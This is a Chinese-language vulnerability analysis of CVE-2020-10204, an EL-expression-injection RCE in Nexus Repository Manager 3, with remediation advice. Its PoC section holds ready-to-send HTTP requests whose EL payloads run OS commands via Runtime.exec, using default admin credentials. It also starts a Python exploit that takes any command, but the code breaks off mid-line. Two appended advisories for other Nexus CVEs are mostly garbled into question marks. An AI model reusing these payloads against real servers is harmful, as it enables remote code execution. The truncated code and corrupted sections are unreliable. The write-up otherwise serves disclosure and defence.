一、漏洞简介¶

1.1 漏洞背景¶

CVE-2020-10204 与 CVE-2020-10199 同时发布，同样由 GitHub Security Lab 的 @pwntester 发现。该漏洞同样利用 EL 表达式注入，但需要管理员权限才能触发。

与 CVE-2020-10199 不同的是，CVE-2020-10204 影响更多的 API 端点，包括用户管理和角色管理接口。

1.2 漏洞概述（包含 CVE 编号、危害等级、漏洞类型、披露时间等）¶

补充核验信息：公开时间：2020-04-01；NVD 评分：7.2（HIGH）；CWE：CWE-20。

二、影响范围¶

2.1 受影响的版本¶

• Nexus Repository Manager 3 3.0.0 至 3.21.1

2.2 不受影响的版本¶

• Nexus Repository Manager 3 3.21.2 及以上版本

2.3 触发条件（如特定模块、特定配置、特定运行环境等）¶

1. 具有 Nexus 管理员权限
2. 能够访问 ExtDirect API（/service/extdirect）
3. 目标版本在受影响范围内

三、漏洞详情与原理解析¶

3.1 漏洞触发机制¶

漏洞通过 /service/extdirect 端点触发，影响多个管理功能：

主要触发点：

1. 更新用户接口 - coreui_User.update
2. 创建角色接口 - coreui_Role.create

调用链（更新用户）：

ExtDirectRouter.processRequest()
    ↓
UserComponent.update()
    ↓
buildConstraintViolationWithTemplate()  ← EL 注入

3.2 源码层面的根因分析（结合源码与补丁对比）¶

更新用户漏洞代码：

// UserComponent.java
@DirectMethod
@RequiresAuthentication
@RequiresPermissions("nexus-users:update")
public void update(final UserXO userXO) {
    checkNotNull(userXO);

    // 用户数据验证
    Set<ConstraintViolation<?>> violations = validate(userXO);

    // roles 用户可控，触发 EL 注入
    if (violations.isEmpty()) {
        // ...
    } else {
        maybePropagate(violations);
    }
}

触发点：

用户的 firstName、lastName、email、roles 等字段在验证失败时，会进入错误消息模板，触发 EL 表达式执行。

四、漏洞复现（可选）¶

4.1 环境搭建¶

与 CVE-2020-10199 相同，使用 Docker 或 vulhub 环境。

4.2 PoC 演示与测试过程¶

更新用户触发漏洞：

POST /service/extdirect HTTP/1.1
Host: target:8081
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=

{
    "action": "coreui_User",
    "method": "update",
    "data": [{
        "userId": "test",
        "version": "1.0",
        "firstName": "$+{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}",
        "lastName": "test",
        "email": "test@test.com",
        "status": "active",
        "roles": ["nx-admin"]
    }],
    "type": "rpc",
    "tid": 1
}

创建角色触发漏洞：

POST /service/extdirect HTTP/1.1
Host: target:8081
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=

{
    "action": "coreui_Role",
    "method": "create",
    "data": [{
        "id": "$+{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('id')}",
        "name": "test-role",
        "description": "test",
        "privileges": ["nx-all"],
        "roles": []
    }],
    "type": "rpc",
    "tid": 1
}

Python PoC：

```python

!/usr/bin/env python3¶

CVE-2020-10204 PoC¶

import requests import sys

def exploit(target, command): url = f"http://{target}/service/extdirect"

payload = {
    "action": "coreui_User",
    "method": "update",
    "data": [{
        "userId": "admin",
        "version": "1.0",
        "firstName": f"$+{{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('{command}')}}",
        "lastName": "test",
        "email": "admin@test.com

五、修复建议与缓解措施¶

5.1 官方版本升级建议¶

• 优先升级到 3.21.2 或同等后续安全版本。
• 升级前请结合官方发布说明确认兼容性与回滚方案。

5.2 临时缓解方案（如修改配置文件、关闭相关模块、增加 WAF 规则等）¶

• 在完成版本升级前，建议将相关服务限制在可信网络边界内，并最小化暴露面。
• 对高风险接口、插件或调试功能实施临时下线、访问控制与日志监控。

六、参考信息 / 参考链接¶

6.1 官方安全通告¶

• https://support.sonatype.com/hc/en-us/articles/360044356194

6.2 其他技术参考资料¶

• NVD：https://nvd.nist.gov/vuln/detail/CVE-2020-10204
• CVE：https://www.cve.org/CVERecord?id=CVE-2020-10204
• https://support.sonatype.com/hc/en-us/articles/360044356194
• http://{target}/service/extdirect"

Nexus Repository Manager ???????CVE-2017-17717?¶

??????¶

1.1 ????¶

Nexus Repository Manager ???????????? CVE-2017-17717 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• sonatype:nexus_repository_manager:*, <= 2.14.5

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Sonatype Nexus Repository Manager through 2.14.5 has weak password encryption with a hardcoded CMMDwoV value in the LDAP integration feature.
• ??????????????????????????? PoC ???

3.2 ????????????????????¶

• ?????????????CWE-327?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2017-17717
• https://www.cve.org/CVERecord?id=CVE-2017-17717
• http://openwall.com/lists/oss-security/2017/12/17/3

Nexus Repository Manager ???????CVE-2019-9629?¶

??????¶

1.1 ????¶

Nexus Repository Manager ???????????? CVE-2019-9629 ??????????? 2026-03-22 ?????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• sonatype:nexus_repository_manager:*, < 3.17.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ?????????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????Sonatype Nexus Repository Manager before 3.17.0 establishes a default administrator user with weak defaults (fixed credentials).
• ??????????????????????????? PoC ???

3.2 ????????????????????¶

• ?????????????CWE-287?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2019-9629
• https://www.cve.org/CVERecord?id=CVE-2019-9629
• https://www.twistlock.com/labs-blog/vulnerabilities-nexus-repository-left-thousands-artifacts-exposed/